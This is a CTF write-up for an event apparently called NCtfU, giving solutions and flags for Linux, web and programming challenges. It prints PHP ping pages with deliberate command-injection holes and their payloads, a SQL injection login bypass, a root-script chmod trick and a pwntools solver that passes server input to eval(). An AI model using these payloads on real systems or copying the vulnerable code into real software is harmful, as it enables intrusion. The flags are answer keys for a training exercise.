NCtfU Writeup

ctf
, , , , , ,

NCtfU Writeup

All flags have an hash as the suffix, results for knowing if user is using their own flag; So don’t cheat

Basic Linux

Super Secure Shell

Login using ssh (usr:ctf,psw:w3lc0m3_t0_NCtfU)

flag:NCtfU{S3CUR3_SH3L1_d1b639f0b0e34a5b990a174f2f2a77fd}

Long Shopping List

ls is a good command

flag: NCtfU{1_4M_4_SC4RY_GH05T_N07_4_SH0PP1NG_L1S7_5894fc7602db45089b86b9f3f11b14ff}

Cute Cat

cat the flag

flag: NCtfU{CA75_4R3_S0OO0O0O00O0O00OOO0OO0OOOO0O_G00OOOO0OO0O00O0OD_8214817b2d724f38a280efd1bf3d015a}

Where is my change?

cd into the directory

flag: NCtfU{G0OD_U_F0UND_MY_CH4NG3!_fe16dcb368f94b9b8ce0755a5e9867e7}

Hidden Shoppping List

sometimes you just need a -a for ls

flag: NCtfU{B0OOO00OOO00000000_1_SC4R3D_U_d7621beb3d1d4084a80a3a0d9cf4fa9a}

Grapes

$cat grapes | grep "NCtfU" for the solution

flag: NCtfU{D3AL_W17H_GR3P_135c8b583aa74d2a925a9be94faed74b}"

Hide and Seek

sometimes some TAB is a great thing when having no idea of how to pipe it

flag: NCtfU{F1ND_U_L1T7L3_FL49_cd0af659d4ba4feebf4b38a31747513c}

Nice Environment

such an easy $env

flag: NCtfU{0H_1_L0V3_7H15_3NV_bef142acc7fc48a19342365342853d2c}

Run

run the ELF: $./run

flag: NCtfU{RUN_F0R_UR_L1F3_9c5a606412f7422892c97704e1ab6e64}

Bugs

remove the bugs $rm bugs

flag: NCtfU{N0_NO7_4_51N9L3_BU9_C4N_B3_1N_MY_S19H7_067368c08061475987a613ecbaaf0443}

MOO

The flag is at the daily message file!
$cat /etc/update-motd.d/10000-moo

flag: NCtfU{MO0O_MO7D_M0O0_3798ea5955b248b48a4cdae315fc0d99}

You Shall Not Pass

$chmod 777 flag

flag: NCtfU{N0_0N3_C4N_S70P_M3_N0_0N3_06c0f09daef34d6892fa59d6e28118f9}

Flag Printer

Hint: you can cat a ELF too!!

flag: NCtfU{F0UND_M3_1N_7H3_S0URC3_d3ccf6384ea64f18b3e9a9770f8584d7}

Running Flag

$ps -ax

flag: NCtfU{U_H4V3_C47CH_7H3_RUNN1N9_FL49_1259eb4388cd41b8983518dc0bb3bfa6}

You Shall Not Pass Revenge

$echo chmod 777 flag > update.sh

flag: NCtfU{U_C4N_RUN_W17H_R0OT_3VEN_U_4R3_N07_ROOT_US3R_73a096095c814d7fae5d683240c406bb}

Web

Baby Web Ping

A basic command injection, no need to bypass.
code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ping</title>
</head>
<body>
    <form action="." method="GET">
        CMD: <input type="text" name="cmd" value="ping www.google.com.tw"> <input type="submit" value="run command!">
    </form>
    <pre><?php

        set_time_limit(2);

        if(!empty($_GET['cmd']))
            echo htmlentities(system($_GET['cmd']));
        else
            highlight_file(__FILE__);
    ?></pre>
</body>
</html>

payload: cat flag

flag: NCtfU{B4D_BAD_P1N9_dfe60bb115ae4df88795170a7bbdea6a}

Easy Web Ping

Need pipe to bypass it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ping</title>
</head>
<body>
    <form action="." method="GET">
        Ping: <input type="text" name="ping" value="www.google.com.tw"> <input type="submit" value="run command!">
    </form>
    <pre><?php

        set_time_limit(2);

        if(!empty($_GET['ping']))
            echo htmlentities(system('ping -c 4 '.$_GET['ping']));
        else
            highlight_file(__FILE__);
    ?></pre>
</body>
</html>

payload: |cat flag

flag: NCtfU{H0W_D1D_U_U53_AN07H3R_CMD_561afb86e8934bff84e02ac74134c1bd}

Beauitful Website 1

  1. Found a hidden page in anime_girls’ page
  2. Edit page 302 to login
    1
    2
    <?php
    header('Location: /?page=login');
  3. Test the login form with basic sql injections
    payload: 1' or 1=1 -- -
  4. Get all pages with the source viewer

flag: NCtfU{an_easy_flag_for_you_9fc38735e2d74b07b411b5cd45a9378d}

Beauitful Website 2

Question said that the flag is the user’s password

  1. As Beautiful Website 1, we can se the source code of panel.php and finding out how the site comfirm wether is loggin or not
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if (!isset($_COOKIE['token'])) {
        header('Location: /');
        die();
    }
    [$data, $sig] = explode('.', $_COOKIE['token']);
    if (md5($data . $_ENV['SALT']) !== $sig) {
        header('Location: /');
        die();
    }
    $user = json_decode(base64_decode($data), true);
  2. Now we know the cookie is something like base64(json).md5(sth) and is named token
  3. decode the front part of the cookie within b64
  4. After decoding you’ll get somthing like
    1
    {"user":"user","pass":"NCtfU{sql_injection_strikes_again_fc08d00973c94001a32c82184e10f23d}","is_admin":"0","is_enabled":"1"}
    flag: NCtfU{sql_injection_strikes_again_fc08d00973c94001a32c82184e10f23d}

Advanced Linux

Is this zip?

No it isn’t.
$file a_zip.zip
>a_zip.zip: PNG image data, 324 x 332, 8-bit/color RGB, non-interlaced
$mv a_zip.zip a_zip.png

flag: NCtfU{F1L3_E*73N510N_5UCKS}

Running Flag Revenge

First finding the process ID of the running program

PID: 17

Then: $cat /proc/17/exe

flag: NCtfU{7H3_FL49_H1DD3N_1N_7H3_PR0C3SS_020fb342d8394b8c92df93f50a475691}

Programming

Online Judge

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

conn=remote('nctfu.csie.ncu.edu.tw',23807)
def rl():
    return conn.recvline().decode('utf-8').strip('\n')
def rtl():
    return conn.recvuntil('ans:').decode('utf-8').strip('\n')

print(rl())
print(rl())
haha=0
while 1:
    if(haha==1000):
        ans=conn.recvuntil('\n').decode('utf-8').strip('\n')
        print(ans)
        break
    s=rtl()
    print(s)
    s=s.split(':')[-2].strip(' ').strip('\nans')
    print(str(eval(s)))
    conn.sendline(str(eval(s)))
    haha+=1

flag: NCtfU{U_4R3_F45T_W17H_T0OL5_fe2e7c89a61943349d60d90d25b3a07d}